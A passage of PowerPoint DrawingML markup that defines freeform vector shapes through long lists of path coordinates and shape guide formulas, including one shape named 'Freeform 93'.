                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9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166" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>
                  <a:gd name="T119" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>
                  <a:gd name="T183" fmla="*/ 112 h 11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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="69"/>
